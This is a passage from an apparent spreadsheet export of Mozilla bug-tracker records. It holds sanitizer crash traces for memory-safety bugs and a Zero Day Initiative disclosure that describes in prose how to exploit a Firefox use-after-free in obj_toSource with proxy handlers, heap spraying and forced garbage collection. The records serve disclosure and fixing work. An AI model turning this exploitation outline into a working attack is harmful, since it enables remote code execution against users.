    #1 0x7f0fb137ab2a in nsTextFrame::PeekOffsetWord(bool, bool, bool, int*, nsIFrame::PeekWordState*) layout/generic/nsTextFrameThebes.cpp:6733
    #2 0x7f0fb0fa0b57 in nsIFrame::PeekOffset(nsPeekOffsetStruct*) layout/generic/nsFrame.cpp:6226
    #3 0x7f0fb0f5b56e in nsFrame::PeekBackwardAndForward(nsSelectionAmount, nsSelectionAmount, int, nsPresContext*, bool, unsigned int) layout/generic/nsFrame.cpp:2954
    #4 0x7f0fb0f5a4f5 in nsFrame::SelectByTypeAtPoint(nsPresContext*, nsPoint const&amp;, nsSelectionAmount, nsSelectionAmount, unsigned int) layout/generic/nsFrame.cpp:2862
    #5 0x7f0fb0f5d56b in nsFrame::HandleMultiplePress(nsPresContext*, nsGUIEvent*, nsEventStatus*, bool) layout/generic/nsFrame.cpp:2911
    #6 0x7f0fb0f559d9 in nsFrame::HandlePress(nsPresContext*, nsGUIEvent*, nsEventStatus*) layout/generic/nsFrame.cpp:2710
    #7 0x7f0fb0f4f9b7 in nsFrame::HandleEvent(nsPresContext*, nsGUIEvent*, nsEventStatus*) layout/generic/nsFrame.cpp:2401
    #8 0x7f0fb0c2a70e in nsPresShellEventCB::HandleEvent(nsEventChainPostVisitor&amp;) layout/base/nsPresShell.cpp:491
    #9 0x7f0fb338abd3 in nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, unsigned int, nsDispatchingCallback*, bool, nsCxPusher*) content/events/src/nsEventDispatcher.cpp:362
    #10 0x7f0fb338fe79 in nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;nsIDOMEventTarget&gt;*) content/events/src/nsEventDispatcher.cpp:629
    #11 0x7f0fb0be882c in PresShell::HandleEventInternal(nsEvent*, nsEventStatus*) layout/base/nsPresShell.cpp:6437
    #12 0x7f0fb0be2ea3 in PresShell::HandlePositionedEvent(nsIFrame*, nsGUIEvent*, nsEventStatus*) layout/base/nsPresShell.cpp:6208
    #13 0x7f0fb0bdaed6 in PresShell::HandleEvent(nsIFrame*, nsGUIEvent*, bool, nsEventStatus*) layout/base/nsPresShell.cpp:6007
    #14 0x7f0fb454c39c in nsViewManager::DispatchEvent(nsGUIEvent*, nsIView*, nsEventStatus*) view/src/nsViewManager.cpp:767
    #15 0x7f0fb4537f37 in nsView::HandleEvent(nsGUIEvent*, bool) view/src/nsView.cpp:1062
    #16 0x7f0fb453818d in non-virtual thunk to nsView::HandleEvent(nsGUIEvent*, bool) :?
    #17 0x7f0fb9ca5e0a in nsWindow::DispatchEvent(nsGUIEvent*, nsEventStatus&amp;) widget/gtk2/nsWindow.cpp:458
    #18 0x7f0fb9cd9541 in nsWindow::OnButtonPressEvent(_GtkWidget*, _GdkEventButton*) widget/gtk2/nsWindow.cpp:2729
    #19 0x7f0fb9cf04d9 in button_press_event_cb(_GtkWidget*, _GdkEventButton*) widget/gtk2/nsWindow.cpp:5256
    #20 0x7f0fab655dd7 in ?? ??:0
0x7f0f8a78828b is located 1 bytes to the right of 10-byte region [0x7f0f8a788280,0x7f0f8a78828a)
allocated by thread T0 here:
    #0 0x4c3640 in malloc ??:?
    #1 0x7f0fc9f7255a in moz_xmalloc memory/mozalloc/mozalloc.cpp:57
    #2 0x7f0faef6a566 in nsTArrayInfallibleAllocator::Malloc(unsigned long) ../../dist/include/nsTArray.h:60
    #3 0x7f0faef6849e in nsTArray_base&lt;nsTArrayDefaultAllocator&gt;::EnsureCapacity(unsigned int, unsigned int) ../../dist/include/nsTArray-inl.h:119
    #4 0x7f0fb1379494 in nsTArray&lt;bool, nsTArrayDefaultAllocator&gt;::AppendElements(unsigned int) ../../../dist/include/nsTArray.h:902
    #5 0x7f0fb1377eb7 in ClusterIterator layout/generic/nsTextFrameThebes.cpp:6683
    #6 0x7f0fb137ab1d in nsTextFrame::PeekOffsetWord(bool, bool, bool, int*, nsIFrame::PeekWordState*) layout/generic/nsTextFrameThebes.cpp:6731
    #7 0x7f0fb0fa0b57 in nsIFrame::PeekOffset(nsPeekOffsetStruct*) layout/generic/nsFrame.cpp:6226
    #8 0x7f0fb0f5b56e in nsFrame::PeekBackwardAndForward(nsSelectionAmount, nsSelectionAmount, int, nsPresContext*, bool, unsigned int) layout/generic/nsFrame.cpp:2954
    #9 0x7f0fb0f5a4f5 in nsFrame::SelectByTypeAtPoint(nsPresContext*, nsPoint const&amp;, nsSelectionAmount, nsSelectionAmount, unsigned int) layout/generic/nsFrame.cpp:2862
    #10 0x7f0fb0f5d56b in nsFrame::HandleMultiplePress(nsPresContext*, nsGUIEvent*, nsEventStatus*, bool) layout/generic/nsFrame.cpp:2911
    #11 0x7f0fb0f559d9 in nsFrame::HandlePress(nsPresContext*, nsGUIEvent*, nsEventStatus*) layout/generic/nsFrame.cpp:2710
    #12 0x7f0fb0f4f9b7 in nsFrame::HandleEvent(nsPresContext*, nsGUIEvent*, nsEventStatus*) layout/generic/nsFrame.cpp:2401
    #13 0x7f0fb0c2a70e in nsPresShellEventCB::HandleEvent(nsEventChainPostVisitor&amp;) layout/base/nsPresShell.cpp:491
    #14 0x7f0fb338abd3 in nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, unsigned int, nsDispatchingCallback*, bool, nsCxPusher*) content/events/src/nsEventDispatcher.cpp:362
    #15 0x7f0fb338fe79 in nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;nsIDOMEventTarget&gt;*) content/events/src/nsEventDispatcher.cpp:629
    #16 0x7f0fb0be882c in PresShell::HandleEventInternal(nsEvent*, nsEventStatus*) layout/base/nsPresShell.cpp:6437
    #17 0x7f0fb0be2ea3 in PresShell::HandlePositionedEvent(nsIFrame*, nsGUIEvent*, nsEventStatus*) layout/base/nsPresShell.cpp:6208
    #18 0x7f0fb0bdaed6 in PresShell::HandleEvent(nsIFrame*, nsGUIEvent*, bool, nsEventStatus*) layout/base/nsPresShell.cpp:6007
    #19 0x7f0fb454c39c in nsViewManager::DispatchEvent(nsGUIEvent*, nsIView*, nsEventStatus*) view/src/nsViewManager.cpp:767
    #20 0x7f0fb4537f37 in nsView::HandleEvent(nsGUIEvent*, bool) view/src/nsView.cpp:1062
    #21 0x7f0fb453818d in non-virtual thunk to nsView::HandleEvent(nsGUIEvent*, bool) :?
    #22 0x7f0fb9ca5e0a in nsWindow::DispatchEvent(nsGUIEvent*, nsEventStatus&amp;) widget/gtk2/nsWindow.cpp:458
    #23 0x7f0fb9cd9541 in nsWindow::OnButtonPressEvent(_GtkWidget*, _GdkEventButton*) widget/gtk2/nsWindow.cpp:2729
    #24 0x7f0fb9cf04d9 in button_press_event_cb(_GtkWidget*, _GdkEventButton*) widget/gtk2/nsWindow.cpp:5256
Shadow byte and word:
  0x1fe1f14f1051: 2
  0x1fe1f14f1050: 00 02 fb fb fb fb fb fb
More shadow bytes:
  0x1fe1f14f1030: fa fa fa fa fa fa fa fa
  0x1fe1f14f1038: fa fa fa fa fa fa fa fa
  0x1fe1f14f1040: fa fa fa fa fa fa fa fa
  0x1fe1f14f1048: fa fa fa fa fa fa fa fa
=&gt;0x1fe1f14f1050: 00 02 fb fb fb fb fb fb
  0x1fe1f14f1058: fb fb fb fb fb fb fb fb
  0x1fe1f14f1060: fa fa fa fa fa fa fa fa
  0x1fe1f14f1068: fa fa fa fa fa fa fa fa
  0x1fe1f14f1070: fa fa fa fa fa fa fa fa
Stats: 247M malloced (270M for red zones) by 396757 calls
Stats: 42M realloced by 23311 calls
Stats: 223M freed by 275477 calls
Stats: 90M really freed by 187533 calls
Stats: 480M (122969 full pages) mmaped in 120 calls
  mmaps   by size class: 8:294894; 9:32764; 10:8190; 11:14329; 12:2048; 13:1536; 14:1280; 15:256; 16:1152; 17:1280; 18:144; 19:40; 20:20;
  mallocs by size class: 8:330117; 9:32695; 10:8737; 11:16289; 12:2501; 13:1727; 14:1555; 15:317; 16:1287; 17:1317; 18:154; 19:40; 20:21;
  frees   by size class: 8:224898; 9:24420; 10:5483; 11:13159; 12:1629; 13:1507; 14:1392; 15:267; 16:1231; 17:1301; 18:134; 19:38; 20:18;
  rfrees  by size class: 8:164815; 9:8613; 10:2103; 11:8730; 12:630; 13:557; 14:541; 15:144; 16:1042; 17:328; 18:25; 19:4; 20:1;
Stats: malloc large: 1532 small slow: 2246
==11059== ABORTING</t>
        </is>
      </c>
      <c r="X1084" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1085">
      <c r="A1085" t="n">
        <v>1209368</v>
      </c>
      <c r="B1085" t="inlineStr">
        <is>
          <t>2015-09-28 18:30:55 -0700</t>
        </is>
      </c>
      <c r="C1085" t="inlineStr">
        <is>
          <t>MSan: use-of-uninitialized-value in DecodeVarLenUint8 (decode.c:81)</t>
        </is>
      </c>
      <c r="D1085" t="inlineStr">
        <is>
          <t>2016-05-26 00:20:26 -0700</t>
        </is>
      </c>
      <c r="E1085" t="n">
        <v>1</v>
      </c>
      <c r="F1085" t="n">
        <v>1</v>
      </c>
      <c r="G1085" t="n">
        <v>3</v>
      </c>
      <c r="H1085" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1085" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1085" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K1085" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L1085" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1085" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1085" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1085" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1085" t="inlineStr">
        <is>
          <t>[adv-main44+]</t>
        </is>
      </c>
      <c r="Q1085" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1085" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1085" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1085" t="n">
        <v>1</v>
      </c>
      <c r="U1085" t="n">
        <v>0</v>
      </c>
      <c r="V1085" t="n">
        <v>3</v>
      </c>
      <c r="W1085" t="inlineStr">
        <is>
          <t>Created attachment 8667057
call_stack.txt
Not sure which component this should go under so I copied bug 366559 for now.
I am fuzzing commit https://github.com/google/brotli/commit/ca29aa22c295daac15baf5d85427ecc7808b515c
This is the version of brotli currently shipping in Firefox (https://hg.mozilla.org/mozilla-central/log/tip/modules/brotli/dec/decode.c).
It is currently used in WOFF2.</t>
        </is>
      </c>
      <c r="X1085" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1086">
      <c r="A1086" t="n">
        <v>1113270</v>
      </c>
      <c r="B1086" t="inlineStr">
        <is>
          <t>2014-12-18 11:23:17 -0800</t>
        </is>
      </c>
      <c r="C1086" t="inlineStr">
        <is>
          <t>Connect posting for newsletter sign up</t>
        </is>
      </c>
      <c r="D1086" t="inlineStr">
        <is>
          <t>2015-04-21 02:08:24 -0700</t>
        </is>
      </c>
      <c r="E1086" t="n">
        <v>1</v>
      </c>
      <c r="F1086" t="n">
        <v>1</v>
      </c>
      <c r="G1086" t="n">
        <v>5</v>
      </c>
      <c r="H1086" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1086" t="inlineStr">
        <is>
          <t>Websites</t>
        </is>
      </c>
      <c r="J1086" t="inlineStr">
        <is>
          <t>Shape of the Web</t>
        </is>
      </c>
      <c r="K1086" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1086" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1086" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1086" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1086" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1086" t="inlineStr">
        <is>
          <t xml:space="preserve">[kb=1617256] </t>
        </is>
      </c>
      <c r="Q1086" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1086" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1086" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1086" t="n">
        <v>1</v>
      </c>
      <c r="U1086" t="n">
        <v>0</v>
      </c>
      <c r="V1086" t="n">
        <v>18</v>
      </c>
      <c r="W1086" t="inlineStr">
        <is>
          <t>This is to connect the posting for the newsletter sign up on Shape of the Web (aka Lorax).
We will be posting to the MoFo newsletter.
We were pointed to the mozilla.org homepage by Andrea Wood as an example of how to write to the newsletter
e.g.
https://www.mozilla.org/en-US/
https://www.mozilla.org/es-ES/</t>
        </is>
      </c>
      <c r="X1086" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1087">
      <c r="A1087" t="n">
        <v>914017</v>
      </c>
      <c r="B1087" t="inlineStr">
        <is>
          <t>2013-09-08 21:45:43 -0700</t>
        </is>
      </c>
      <c r="C1087" t="inlineStr">
        <is>
          <t>Stack-buffer-overflow in txXPathNodeUtils::getBaseURI</t>
        </is>
      </c>
      <c r="D1087" t="inlineStr">
        <is>
          <t>2024-05-30 08:07:22 -0700</t>
        </is>
      </c>
      <c r="E1087" t="n">
        <v>1</v>
      </c>
      <c r="F1087" t="n">
        <v>1</v>
      </c>
      <c r="G1087" t="n">
        <v>3</v>
      </c>
      <c r="H1087" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1087" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1087" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K1087" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1087" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1087" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1087" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1087" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1087" t="inlineStr">
        <is>
          <t>[asan][adv-main25+][adv-esr1710+][adv-esr24-1+]</t>
        </is>
      </c>
      <c r="Q1087" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1087" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1087" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T1087" t="n">
        <v>1</v>
      </c>
      <c r="U1087" t="n">
        <v>0</v>
      </c>
      <c r="V1087" t="n">
        <v>15</v>
      </c>
      <c r="W1087" t="inlineStr">
        <is>
          <t>Created attachment 801365
Testcase
==12693==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff3757e180 at pc 0x7ffc253f35bf bp 0x7fff3757dbe0 sp 0x7fff3757dbd8
READ of size 8 at 0x7fff3757e180 thread T0
    #0 0x7ffc253f35be in txXPathNodeUtils::getBaseURI(txXPathNode const&amp;, nsAString_internal&amp;) content/xslt/src/xpath/txMozillaXPathTreeWalker.cpp:569
    #1 0x7ffc25419cc0 in txLoadedDocumentsHash::~txLoadedDocumentsHash() content/xslt/src/xslt/txExecutionState.cpp:39
    #2 0x7ffc2541aa77 in txExecutionState::~txExecutionState() content/xslt/src/xslt/txExecutionState.cpp:94
    #3 0x7ffc2545273c in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) content/xslt/src/xslt/txMozillaXSLTProcessor.cpp:679
    #4 0x7ffc2804cfc1 in NS_InvokeByIndex xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #5 0x7ffc26242ece in Invoke js/xpconnect/src/XPCWrappedNative.cpp:2809
    #6 0x7ffc26242ece in CallMethodHelper js/xpconnect/src/XPCWrappedNative.cpp:2149
    #7 0x7ffc26242ece in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) js/xpconnect/src/XPCWrappedNative.cpp:2115
    #8 0x7ffc2625506b in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1310
    #9 0x7ffc2984ee0a in native js/src/jscntxtinlines.h:219
    #10 0x7ffc2984ee0a in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:489
    #11 0x7ffc29842069 in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2459
    #12 0x7ffc298309f1 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:446
    #13 0x7ffc2985108b in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) js/src/vm/Interpreter.cpp:630
    #14 0x7ffc298513e6 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) js/src/vm/Interpreter.cpp:666
    #15 0x7ffc29a54c6d in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) js/src/jsapi.cpp:5120
    #16 0x7ffc256b72ef in nsJSUtils::EvaluateString(JSContext*, nsAString_internal const&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, nsJSUtils::EvaluateOptions&amp;, JS::Value*) dom/base/nsJSUtils.cpp:268
    #17 0x7ffc256a5357 in nsJSContext::EvaluateString(nsAString_internal const&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, bool, JS::Value*) dom/base/nsJSEnvironment.cpp:993
    #18 0x7ffc25662dfc in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) dom/base/nsGlobalWindow.cpp:10473
    #19 0x7ffc256476d2 in nsGlobalWindow::RunTimeout(nsTimeout*) dom/base/nsGlobalWindow.cpp:10717
    #20 0x7ffc2566203c in nsGlobalWindow::TimerCallback(nsITimer*, void*) dom/base/nsGlobalWindow.cpp:10964
    #21 0x7ffc2800f9e1 in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:546
    #22 0x7ffc28010086 in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:630
    #23 0x7ffc28005b39 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:622
    #24 0x7ffc27f2d571 in NS_ProcessNextEvent(nsIThread*, bool) objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:238
    #25 0x7ffc26d38880 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:116
    #26 0x7ffc28125253 in RunInternal ipc/chromium/src/base/message_loop.cc:220
    #27 0x7ffc28125253 in RunHandler ipc/chromium/src/base/message_loop.cc:213
    #28 0x7ffc28125253 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:187
    #29 0x7ffc26b2201c in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:161
    #30 0x7ffc265101ce in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:269
    #31 0x7ffc2392f300 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3869
    #32 0x7ffc2393023a in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3937
    #33 0x7ffc2393116b in XRE_main toolkit/xre/nsAppRunner.cpp:4139
    #34 0x45524d in do_main browser/app/nsBrowserApp.cpp:275
    #35 0x45524d in main browser/app/nsBrowserApp.cpp:635
    #36 0x7ffc32a9676c in
    #37 0x45483c in _start
Address 0x7fff3757e180 is located in stack of thread T0 at offset 896 in frame
    #0 0x7ffc2545214f in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) content/xslt/src/xslt/txMozillaXSLTProcessor.cpp:629
  This frame has 4 object(s):
    [32, 40) 'sourceDOMDocument'
    [96, 784) 'es'
    [832, 872) 'handlerFactory'
    [928, 936) 'doc'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
Shadow bytes around the buggy address:
  0x100066ea7be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100066ea7bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100066ea7c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100066ea7c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100066ea7c20: 00 00 f4 f4 f2 f2 f2 f2 00 00 00 00 00 f4 f4 f4
=&gt;0x100066ea7c30:[f2]f2 f2 f2 00 f4 f4 f4 f3 f3 f3 f3 00 00 00 00
  0x100066ea7c40: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
  0x100066ea7c50: 00 00 00 00 00 00 f4 f4 f2 f2 f2 f2 00 00 00 00
  0x100066ea7c60: 00 00 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00 00
  0x100066ea7c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100066ea7c8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12693==ABORTING</t>
        </is>
      </c>
      <c r="X1087" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1088">
      <c r="A1088" t="n">
        <v>814029</v>
      </c>
      <c r="B1088" t="inlineStr">
        <is>
          <t>2012-11-21 08:44:58 -0800</t>
        </is>
      </c>
      <c r="C1088" t="inlineStr">
        <is>
          <t>obj_toSource Use-After-Free Remote Code Execution Vulnerability (ZDI-CAN-1571)</t>
        </is>
      </c>
      <c r="D1088" t="inlineStr">
        <is>
          <t>2014-03-12 17:32:09 -0700</t>
        </is>
      </c>
      <c r="E1088" t="n">
        <v>1</v>
      </c>
      <c r="F1088" t="n">
        <v>1</v>
      </c>
      <c r="G1088" t="n">
        <v>3</v>
      </c>
      <c r="H1088" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1088" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1088" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1088" t="inlineStr">
        <is>
          <t>16 Branch</t>
        </is>
      </c>
      <c r="L1088" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1088" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1088" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1088" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1088" t="inlineStr">
        <is>
          <t>fixed in Fx18 by bug 782467 [adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q1088" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1088" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1088" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T1088" t="n">
        <v>1</v>
      </c>
      <c r="U1088" t="n">
        <v>0</v>
      </c>
      <c r="V1088" t="n">
        <v>15</v>
      </c>
      <c r="W1088" t="inlineStr">
        <is>
          <t>Created attachment 684049
PoC
-- CVSS -----------------------------------------
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P
-- ABSTRACT -------------------------------------
TippingPoint has identified a vulnerability affecting the following products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
Tested on 16.0.2
From js/src/jsobj.cpp:
obj_toSource(JSContext *cx, uintN argc, Value *vp) {
...
JSObject *obj = ToObject(cx, &amp;vp1);
if (!obj)
return false;
JSHashEntry *he = js_EnterSharpObject(cx, obj, &amp;amp;ida, &amp;amp;chars);
    if (!he)
        return false;
    ...
}
js_EnterSharpObject(JSContext *cx, JSObject *obj, JSIdArray **idap,
jschar **sp) {
...
*sp = NULL;
map = &amp;cx-&gt;sharpObjectMap;
...
ida = NULL;
    if (map-&gt;depth == 0) {
        ...
        ++map-&gt;depth;
        he = MarkSharpObjects(cx, obj, &amp;amp;ida);
        --map-&gt;depth;
        ...
    } else {
        ...
    }
    ...
}
MarkSharpObjects(JSContext *cx, JSObject *obj, JSIdArray **idap) {
...
map = &amp;cx-&gt;sharpObjectMap;
JS_ASSERT(map-&gt;depth &gt;= 1);
table = map-&gt;table;
hash = js_hash_object(obj);
hep = JS_HashTableRawLookup(table, hash, obj);
he = *hep;
if (!he) {
...
ida = JS_Enumerate(cx, obj);
if (!ida)
return NULL;
ok = JS_TRUE;
        for (i = 0, length = ida-&gt;length; i &lt; length; i++) {
            id = ida-&gt;vector[i];
            ok = obj-&gt;lookupGeneric(cx, id, &amp;amp;obj2, &amp;amp;prop);
            ...
        }
        ...
    } else {
        ...
    }
    ...
}
Note that |jsid|s stored at |ida| are unrooted during execution of |obj_toSource()| and its sub-functions. This means that after successful
call to |JS_Enumerate()| one can drop (previously returned) |jsid|s from the
parent object and force their removal due to garbage collection. It can be done
during call to |obj-&gt;lookupGeneric()|. Such action will lead to a dangling
pointer vulnerability at the following |for| iteration: |ida-&gt;vector[i]| will
contain pointer to already freed object.
-------
Exploit
-------
1. Create JavaScript Proxy object with the following characteristics:
a) Handler method "get" returns dummy data just to fulfill the contract
with the iterator.
b) Handler method "has" always returns "true" to prolong process of
iterating over properties. It also sprays the heap and forces garbage
collection.
c) Handler method "keys" returns bogus unrooted list of properties.
Instances of E4X QName class are used for the sake of reliability.
2. Call JavaScript object's |toSource()| method - this leads to a dangling
pointer condition.
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   regenrecht
-- FURTHER DETAILS ------------------------------
If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.
Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 180 days of the reported date. If you are ready to release a patch at any point leading up the the deadline please coordinate with us so that we may release our advisory detailing the issue. If the 180 day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:
Zero Day Initiative
zdi-disclosures@tippingpoint.com
The PGP key used for all ZDI vendor communications is available from:
     http://www.zerodayinitiative.com/documents/zdi-pgp-key.asc
-- INFORMATION ABOUT THE ZDI ---------------------
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Please contact us for further information or refer to:
    http://www.zerodayinitiative.com
-- DISCLOSURE POLICY ----------------------------
Our vulnerability disclosure policy is available online at:
    http://www.zerodayinitiative.com/advisories/disclosure_policy/</t>
        </is>
      </c>
      <c r="X1088" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1089">
      <c r="A1089" t="n">
        <v>368979</v>
      </c>
      <c r="B1089" t="inlineStr">
        <is>
          <t>2007-02-01 08:09:29 -0800</t>
        </is>
      </c>
      <c r="C1089" t="inlineStr">
        <is>
          <t>Enable to use mozStorage component with xulrunner1.8.1 .</t>
        </is>
      </c>
      <c r="D1089" t="inlineStr">
        <is>
          <t>2016-02-12 08:12:53 -0800</t>
        </is>
      </c>
      <c r="E1089" t="n">
        <v>1</v>
      </c>
      <c r="F1089" t="n">
        <v>1</v>
      </c>
      <c r="G1089" t="n">
        <v>6</v>
      </c>
      <c r="H1089" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1089" t="inlineStr">
        <is>
          <t>Toolkit Graveyard</t>
        </is>
      </c>
      <c r="J1089" t="inlineStr">
        <is>
          <t>XULRunner</t>
        </is>
      </c>
      <c r="K1089" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L1089" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1089" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1089" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1089" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1089" t="inlineStr"/>
      <c r="Q1089" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1089" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1089" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1089" t="n">
        <v>1</v>
      </c>
      <c r="U1089" t="n">
        <v>0</v>
      </c>
      <c r="V1089" t="n">
        <v>8</v>
      </c>
      <c r="W1089" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.8.1.1) Gecko/20060601 Firefox/2.0.0.1 (Ubuntu-edgy)
Build Identifier: MOZILLA_1_8_1_RELEASE
